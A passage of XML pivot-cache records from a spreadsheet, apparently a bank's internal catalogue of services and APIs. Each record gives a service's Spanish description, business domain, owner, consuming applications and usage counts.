    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Notificacion Credito Consumo"/>
    <n v="200"/>
    <s v="No Aplica"/>
    <s v="El servicio NotificacionCreditoConsumo permite notificar por parte de Bizagi al aplicativo front los avances de cada uno de los pasos del flujo de crédito de consumo, habilitando así el intercambio de información entre las dos partes hasta completar la venta del producto. "/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="Bankvision - BVL_Cartera moneda legal y extranjera_ISBVL0001"/>
    <s v="AW0937 _x000d__x000a_AW1285001 _x000d__x000a_AW0856"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Notificacion Entrega Producto Debito"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Notificar Entrega - Tarjeta Debito - permite llevar a cabo las siguientes funcionalidades:  • Permite al proveedor logístico, notificar la entrega de la tarjeta débito, aclarando los datos finales de entrega."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Debito y Prepago"/>
    <s v="Medios de pago Emision"/>
    <s v="Productor"/>
    <s v="Tarjetas Débito"/>
    <s v="Soledad Morales Llano"/>
    <m/>
    <m/>
    <s v="APIC _x000d__x000a_AW1285001 _x000d__x000a_NU0104001 _x000d__x000a_NU0170001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Notificacion Envio Reporte Leasing"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Notificación Envío Reporte Leasing permitirá a los consumidores hacer solicitudes al back de leasing para la generación y envío de algún tipo de reporte de operaciones que por su volumen de información deba ser entregado en buzón seguro."/>
    <s v="LEASING"/>
    <s v="Leasing"/>
    <s v="Leasing"/>
    <s v="Productor"/>
    <s v="Administración del ciclo de vida del activo"/>
    <s v="Juan Pablo Bahamon Betancur"/>
    <m/>
    <m/>
    <s v="AW0360006"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Notificacion Envio Reporte Prestamo"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v=" Este servicio permite notificar que se debe generar y enviar a buzón seguro, el reporte de los préstamos asociados al convenio"/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="No Tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Notificacion Fin Procesamiento Archivos Depositos"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Provee a las diferentes aplicaciones que estén interesadas en saber cuándo depósitos termina de procesar el archivo que notificaron con anterioridad a depósitos a través del servicio ProcesamientoArchivosDepositos."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Leidy Yurany Guarin Lopez"/>
    <m/>
    <s v="Finacle Ent._Recaudos - Colombia_AW1065001"/>
    <s v="AW01065 _x000d__x000a_SAI _x000d__x000a_BVD _x000d__x000a_SUF _x000d__x000a_AW1078"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Notificacion Novedad Mesa Ayuda"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Este servicio permite radicar novedades en la aplicación TPClient a través de la virtualización del servicio WSRegistroNovedades que expone Teleperformance."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <s v="SUFI"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <s v="Servicio Web Cliente Sufi_AW1083001"/>
    <s v="AW1142001 _x000d__x000a_TP"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Notificacion Respuesta Documental"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio tiene como alcance recibir notificación de respuesta por cada caso de estudio de crédito, del proceso documental entregado por Kofax y expuesto a Bizagi con la confirmación de los documentos digitalizados exitosamente además de las devoluciones por inconsistencias."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Automatización de Procesos "/>
    <s v="Evolución Digital"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <s v="Bizagi Go_AW0856001"/>
    <s v="AW0922 _x000d__x000a_AW1108001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Notificacion Transacciones Nequi"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio NotificacionTransaccionesNequi, representa la virtualización en el appliance de WebSphere DataPower de una funcionalidad que expone la capa medidora de NEQUI para la recepción de una notificación relacionada con transacciones entre clientes de Bancolombia y clientes de Nequi."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="Finacle (Banco Digital)_AW1011001"/>
    <s v="SVP"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Notificacion Validacion Biometrica"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Servicio a través del cual la aplicación de validación biométrica (Biovoz) notificará al usuario, acciones tales como la regeneración de un token o generación de una nueva contraseña. De igual forma notifica a Teleperformance la acción realizada por parte del usuario."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <s v="SUFI"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <s v="APP-Sufi_AW1209001"/>
    <s v="AW1142001 _x000d__x000a_AW1081001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Notificar Estado Solicitud De Credito_BB12"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio les permite a los consumidores, enviar a Gestión Documental o a BIZAG  información relacionada con el estado de los documentos asociados a una solicitud de un crédito de consumo, el cual es conocido como una notificación."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Automatización de Procesos "/>
    <s v="Evolución Digital"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <s v="Bizagi Go_AW0856001"/>
    <s v="AW0499 _x000d__x000a_AW1176 _x000d__x000a_AW0856 _x000d__x000a_Carvajal"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2020-01-10T11:58:04"/>
    <s v="Notification Generate Report"/>
    <n v="101"/>
    <s v="Notification To Generate Report"/>
    <n v="101"/>
    <s v="Tec-Loans-Notification-To-Generate-Report"/>
    <s v="API que permite notificar que se debe generar y enviar a buzón seguro"/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <s v="NotificacionEnvioReportePrestamo/V1.0"/>
    <s v="Bankvision - BVL_Cartera moneda legal y extranjera_ISBVL0001"/>
    <s v="PortalLibranzas_AW0360007 _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <n v="11"/>
    <n v="8"/>
    <n v="43"/>
    <n v="73"/>
    <n v="56"/>
    <x v="3"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-08-04T17:33:06"/>
    <s v="Notifications"/>
    <n v="100"/>
    <s v="Notifications - Alert and Notifications Information"/>
    <n v="100"/>
    <s v="notifications-alert-and-notifications-information"/>
    <s v="API que permite consultar la siguiente información de un cliente:  - Mecanismo por medio el cual un cliente Bancolombia esta enrolado a clave dinámica, el cual puede variar entre ODA y Softoken.  -  Datos de contacto que fueron proporcionados por un cliente Bancolombia y/o un cliente de Bancolombia a la mano, como lo son níºmero de celular y correo electrónico autorizados para recibir notificaciones."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Distribución Digital"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="ConsultaDatosAlertasyNotificaciones/V1.0"/>
    <m/>
    <s v="AppInversiones_AW1185001 _x000d__x000a_ Recargas_AW1300001 _x000d__x000a_ EDPYME_AW1170 _x000d__x000a_ Desbloqueo-Clave-Dinamica-TDC_NU0100001 _x000d__x000a_ Autorizador-Digitalizacion-Tarjetas_NU0103001 _x000d__x000a_ EASYHOME_NU0004001 _x000d__x000a_ JornadaDepositos_NU0104001 _x000d__x000a_ aprobaciones_AW0360007 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ JornadaPagos_AW1316001 _x000d__x000a_ CryptoAssetsGMN_NU0094001 _x000d__x000a_ LoansOffer_NU0102001 _x000d__x000a_ BancolombiaPay_AW1435001 _x000d__x000a_ HelpContacts_NU0106001 _x000d__x000a_ SecurityOTP_NU0209001 _x000d__x000a_ ALM_AW0955001 _x000d__x000a_ BNPL_NU0287001 _x000d__x000a_ VINCUTRANS_NU0034001 _x000d__x000a_ PagoSinFriccionQrInteroperable_AW1315001 _x000d__x000a_ PreaprobadosSucursales_AW1299001"/>
    <n v="488622"/>
    <n v="553729"/>
    <n v="488258"/>
    <n v="532334"/>
    <n v="594858"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-08-04T17:33:06"/>
    <s v="Notifications"/>
    <n v="300"/>
    <s v="Notifications - Alert and Notifications Information"/>
    <n v="100"/>
    <s v="notifications-alert-and-notifications-subscription"/>
    <s v="API que permite consultar la siguiente información de un cliente:  - Mecanismo por medio el cual un cliente Bancolombia esta enrolado a clave dinámica, el cual puede variar entre ODA y Softoken.  -  Datos de contacto que fueron proporcionados por un cliente Bancolombia y/o un cliente de Bancolombia a la mano, como lo son níºmero de celular y correo electrónico autorizados para recibir notificaciones."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Distribución Digital"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="ConsultaDatosAlertasyNotificaciones/V1.0"/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-08-04T17:33:06"/>
    <s v="Notifications"/>
    <n v="100"/>
    <s v="Notifications - Alert and Notifications Subscription"/>
    <n v="100"/>
    <s v="notifications-send-alerts-and-notifications"/>
    <s v="API que permite realizar la inscripción de un cliente al sistema de alertas y notificaciones, al momento de la aperturación de un producto en Bancolombia. El cliente podrá inscribirse entregando níºmero de celular, correo electrónico o ambos datos."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Distribución Digital"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="GestionAlertasyNotificaciones/V1.0"/>
    <m/>
    <s v="AppInversiones_AW1185001 _x000d__x000a_ Recargas_AW1300001 _x000d__x000a_ EDPYME_AW1170 _x000d__x000a_ Desbloqueo-Clave-Dinamica-TDC_NU0100001 _x000d__x000a_ Autorizador-Digitalizacion-Tarjetas_NU0103001 _x000d__x000a_ EASYHOME_NU0004001 _x000d__x000a_ JornadaDepositos_NU0104001 _x000d__x000a_ aprobaciones_AW0360007 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ JornadaPagos_AW1316001 _x000d__x000a_ CryptoAssetsGMN_NU0094001 _x000d__x000a_ LoansOffer_NU0102001 _x000d__x000a_ BancolombiaPay_AW1435001 _x000d__x000a_ HelpContacts_NU0106001 _x000d__x000a_ SecurityOTP_NU0209001 _x000d__x000a_ ALM_AW0955001 _x000d__x000a_ BNPL_NU0287001 _x000d__x000a_ VINCUTRANS_NU0034001 _x000d__x000a_ PagoSinFriccionQrInteroperable_AW1315001 _x000d__x000a_ PreaprobadosSucursales_AW1299001"/>
    <n v="864184"/>
    <n v="810462"/>
    <n v="758411"/>
    <n v="719610"/>
    <n v="800650"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-08-04T17:33:06"/>
    <s v="Notifications"/>
    <n v="300"/>
    <s v="Notifications - Alert and Notifications Subscription"/>
    <n v="100"/>
    <m/>
    <s v="API que permite realizar la inscripción de un cliente al sistema de alertas y notificaciones, al momento de la aperturación de un producto en Bancolombia. El cliente podrá inscribirse entregando níºmero de celular, correo electrónico o ambos datos."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Distribución Digital"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="GestionAlertasyNotificaciones/V1.0"/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-08-04T17:33:06"/>
    <s v="Notifications"/>
    <n v="100"/>
    <s v="Notifications - Send Alerts And Notifications"/>
    <n v="100"/>
    <m/>
    <s v="La presente API permite obtener la información para crear la estructura de un mensaje de alertas y notificaciones que deba enviarse a un cliente al momento de realizar una transacción. Estas transacciones se encuentran definidas en la sucursal virtual personas y existen también otro tipo de alertas que son obligatorias así­ el cliente no las haya configurado. Esta API consumirá el servicio EnvioAlertasyNotificaciones, que a su vez invoca la aplicación de alertas y notificaciones almacenada en el módulo PCC en el Iseries."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Distribución Digital"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="EnvioAlertasYNotificaciones/V1.0"/>
    <m/>
    <s v="AppInversiones_AW1185001 _x000d__x000a_ Recargas_AW1300001 _x000d__x000a_ EDPYME_AW1170 _x000d__x000a_ Desbloqueo-Clave-Dinamica-TDC_NU0100001 _x000d__x000a_ Autorizador-Digitalizacion-Tarjetas_NU0103001 _x000d__x000a_ EASYHOME_NU0004001 _x000d__x000a_ JornadaDepositos_NU0104001 _x000d__x000a_ aprobaciones_AW0360007 _x000d__x000a_ JornadaDepositos_NU0170001 _x000d__x000a_ JornadaPagos_AW1316001 _x000d__x000a_ CryptoAssetsGMN_NU0094001 _x000d__x000a_ LoansOffer_NU0102001 _x000d__x000a_ BancolombiaPay_AW1435001 _x000d__x000a_ HelpContacts_NU0106001 _x000d__x000a_ SecurityOTP_NU0209001 _x000d__x000a_ ALM_AW0955001 _x000d__x000a_ BNPL_NU0287001 _x000d__x000a_ VINCUTRANS_NU0034001 _x000d__x000a_ PagoSinFriccionQrInteroperable_AW1315001 _x000d__x000a_ PreaprobadosSucursales_AW1299001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-08-04T17:33:06"/>
    <s v="Notifications"/>
    <n v="300"/>
    <s v="Notifications - Send Alerts And Notifications"/>
    <n v="100"/>
    <m/>
    <s v="La presente API permite obtener la información para crear la estructura de un mensaje de alertas y notificaciones que deba enviarse a un cliente al momento de realizar una transacción. Estas transacciones se encuentran definidas en la sucursal virtual personas y existen también otro tipo de alertas que son obligatorias así­ el cliente no las haya configurado. Esta API consumirá el servicio EnvioAlertasyNotificaciones, que a su vez invoca la aplicación de alertas y notificaciones almacenada en el módulo PCC en el Iseries."/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Distribución Digital"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="EnvioAlertasYNotificaciones/V1.0"/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Novedades Tarjetas Credito"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Este servicio permite realizar diferentes tipos de novedades sobre el producto Tarjetas Crédito, los cuales se listan a continuación.  Crear tarjeta de crédito por uso inmediato "/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
    <s v="Medios de pago Emision"/>
    <s v="Productor"/>
    <s v="Digital Medios de Pago"/>
    <s v="Julian David Arboleda Velez"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Novedades Tarjetas Debito"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Este servicio permite realizar diferentes tipos de novedades sobre el producto Tarjetas Débito, los cuales se listan a continuación.  Asociar tarjeta pre expedida  Crear tarjeta personalizada (pendiente)   Bloquear tarjeta (pendiente)   Desbloquear tarjeta "/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Debito y Prepago"/>
    <s v="Medios de pago Emision"/>
    <s v="Productor"/>
    <s v="Tarjetas Débito"/>
    <s v="Soledad Morales Llano"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-01-16T16:03:40"/>
    <s v="Security"/>
    <n v="111"/>
    <s v="OAuth - Provider from OTP"/>
    <n v="102"/>
    <s v="oauth-otp"/>
    <s v="No tiene Descipcion"/>
    <s v="CANALES_DIGITALES"/>
    <s v="Trasversales e Inclusión"/>
    <s v="Distribución Digital"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="GeneracionToken/V1.0"/>
    <m/>
    <s v="CHATBOT _x000d__x000a_ Vinculación Digital _x000d__x000a_ Dummy _x000d__x000a_ Remitly APP1_RTY _x000d__x000a_ BC Portal de Contenido_AW1218001 _x000d__x000a_ TransferWise_TNW"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2019-01-16T16:03:40"/>
    <s v="Security"/>
    <n v="111"/>
    <s v="OAuth - Provider from OTP Pymes"/>
    <n v="100"/>
    <s v="oauth-otp-pymes"/>
    <s v="Proveedor de OAuth2 para autenticación con One Time Password (OTP) para Pymes"/>
    <s v="DESARROLLO_DE_SERVICIOS_E_INTEGRACION"/>
    <s v="SOA y APIs"/>
    <s v="Servicios e Integració​​​​​​​​​​​​​​n"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <s v="GeneracionToken/V1.0"/>
    <m/>
    <s v="CHATBOT _x000d__x000a_ Vinculación Digital _x000d__x000a_ Dummy _x000d__x000a_ Remitly APP1_RTY _x000d__x000a_ BC Portal de Contenido_AW1218001 _x000d__x000a_ TransferWise_TNW"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Obligaciones Hipotecario"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Este servicio expone una capacidad que permite realizar consultas detalladas para obligaciones hipotecarias."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Hipotecario"/>
    <s v="Inmobiliario"/>
    <s v="Productor"/>
    <s v="Hipotecario"/>
    <s v="Martha Luz Pardo"/>
    <m/>
    <m/>
    <s v="AW1294001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-08-04T11:44:12"/>
    <s v="Obligations"/>
    <n v="100"/>
    <s v="Obligations - Maintenance"/>
    <n v="100"/>
    <s v="obligations-maintenance"/>
    <s v="La API expone una capacidad que permite rediferir un préstamo en el aplicativo core."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <s v="Financiación y Consumo"/>
    <s v="Productor"/>
    <s v="Experiencia de Cartera"/>
    <m/>
    <s v="MantenimientoObligacionesCartera/V1.0"/>
    <m/>
    <s v="MonitoreoDCM_NU0084001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Oferta Comercial Tarjetas Credito"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Oferta Comercial Tarjetas Crédito permite a los consumidores calcular una oferta de tarjetas de crédito para un cliente (inicialmente estará disponible sólo para personas, pero la idea es que sirva posteriormente también para PYME).  Para calcular dicha oferta, el servicio funcionará como un orquestador para recuperar información necesaria, tal como: el segmento y sub segmento del cliente, relación cliente-banco, lista de tarjetas que tiene actualmente el cliente, validación para saber si el cliente se encuentra bajo un convenio de nómina.  Después de recopilar la información necesaria, esta información viaja a Medios de Pago quien realiza el cálculo de la oferta, y retorna una lista de tarjetas que se pueden ofrecer al cliente. "/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
    <s v="Medios de pago Emision"/>
    <s v="Productor"/>
    <s v="Digital Medios de Pago"/>
    <s v="Julian David Arboleda Velez"/>
    <m/>
    <m/>
    <s v="AW1285001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Oferta Cuentas Depositos"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Oferta Cuentas Depósitos permite consultar la información de la oferta que ofrece el producto de depósitos como por ejemplo los planes actuales para cuentas de ahorro y corriente. "/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR _x000d__x000a_NU0170001 _x000d__x000a_AW0000852"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-11-24T20:00:26"/>
    <s v="Offer"/>
    <n v="105"/>
    <s v="Offer - Offers"/>
    <n v="115"/>
    <s v="offer-offers"/>
    <s v="El producto Api de Ofertas permite consultar y listar los detalles de toda la información de las ofertas del core no financiero generados para los clientes Bancolombia. Permitiéndole a los consumidores consultar información que puede mostrarse en los distintos portales del banco, favoreciendo a clientes ya que los acerca a ofertas de productos que cumplen su perfil y ayudando a los productores a encontrar nuevas vitrinas de exposición de sus productos."/>
    <s v="ECOSISTEMAS"/>
    <s v="Ecosistemas"/>
    <s v="ECOSISTEMAS"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="CGC_NU0014001 _x000d__x000a_ Portal Contenidos Bancolombia_AW1218001"/>
    <n v="566667"/>
    <n v="392688"/>
    <n v="615224"/>
    <n v="536617"/>
    <n v="483216"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-09-28T20:50:02"/>
    <s v="Operation Leasing"/>
    <n v="101"/>
    <s v="Operation Leasing - Information"/>
    <n v="101"/>
    <s v="operation-leasing-information"/>
    <s v="La API Operation Leasing - Information permitirá a los consumidores realizar la consulta de una o varias obligaciones de Leasing (Financiero, Arrendamiento Operativo u otro) y obtener la información correspondiente al producto, estado y condiciones generales asociados a la operación."/>
    <s v="LEASING"/>
    <s v="Leasing"/>
    <s v="Leasing"/>
    <s v="Productor"/>
    <s v="Leasing"/>
    <s v="Juan Pablo Bahamon Betancur"/>
    <m/>
    <m/>
    <s v="SVETDL_AW0360006 _x000d__x000a_ PORTALCOBRANZA_AW1294001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ ModuloSVELeasing_AW0360006"/>
    <n v="17102"/>
    <n v="12956"/>
    <n v="11486"/>
    <n v="12777"/>
    <n v="14614"/>
    <x v="1"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Pagar Credito Hipotecario"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Permitir Pagar los Créditos Hipotecarios tanto para Personas Naturales (Individuales) como de Constructor, por medio de varios canales como son la Sucursal Virtual Personas (SVP) para créditos individual y Canales Físicos (Golf) para créditos Constructor"/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Hipotecario"/>
    <s v="Inmobiliario"/>
    <s v="Productor"/>
    <s v="Hipotecario"/>
    <s v="Martha Luz Pardo"/>
    <m/>
    <s v="FINACLE 10.6_CREDITO HIPOTECARIO_AW1010001"/>
    <s v="SCI _x000d__x000a_SVP _x000d__x000a_GDE _x000d__x000a_AW01010 _x000d__x000a_AUD"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Pagar Tarjeta Credito"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Realizar pagos de tarjeta de crédito propia y no propia para filiales del exterior (sólo para las filiales Panamá/Cayman), los pagos que se hacen por la sucursal virtual de las tarjetas de crédito del Banco de un cliente o los pagos que este hace de las tarjetas de un tercero."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="FINACLE"/>
    <s v="AW0718001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Paginacion Fondos Fiduciarios"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Este componente permite recorrer la estructura de los datos de los servicios de ConsultaInformacionFondosFiduciarios y ConsultaSaldosFondosFiduciarios, con el propósito de controlar las paginaciones y entregar las consultas solicitadas por el consumidor."/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Negocios Fiduciarios y Fondos"/>
    <s v="Inversiones"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="Framework Servicios Fiduciaria_ISFSF0001"/>
    <s v="AW1187001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Pago Con Transferencia"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Pago Con Transferencia, permite realizar una trasferencia entre cuentas bancolombia, con cobro de comision y su repectivo iva."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Debito y Prepago"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <m/>
    <s v="Modulo de Administración de Tarjetas (MAT)_Tarjeta débito_ISMAT0001"/>
    <s v="BDT _x000d__x000a_AW1165 _x000d__x000a_APICONNECT"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Pago Credito Hipotecario"/>
    <n v="200"/>
    <s v="No Aplica"/>
    <s v="Servicio que permite pagar los créditos hipotecarios tanto para personas naturales (individuales) como de constructor, por medio de varios canales como son la Sucursal Virtual Personas (SVP) para créditos individual y Canales Físicos: Golf (SCI, SAI) para créditos constructor, inicialmente, dichas consultas traerán la información desde FINACLE."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Hipotecario"/>
    <s v="Inmobiliario"/>
    <s v="Productor"/>
    <s v="Hipotecario"/>
    <s v="Martha Luz Pardo"/>
    <m/>
    <m/>
    <s v="SVE _x000d__x000a_NU0004001 _x000d__x000a_DEVELOPSOATEST _x000d__x000a_NU0166001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
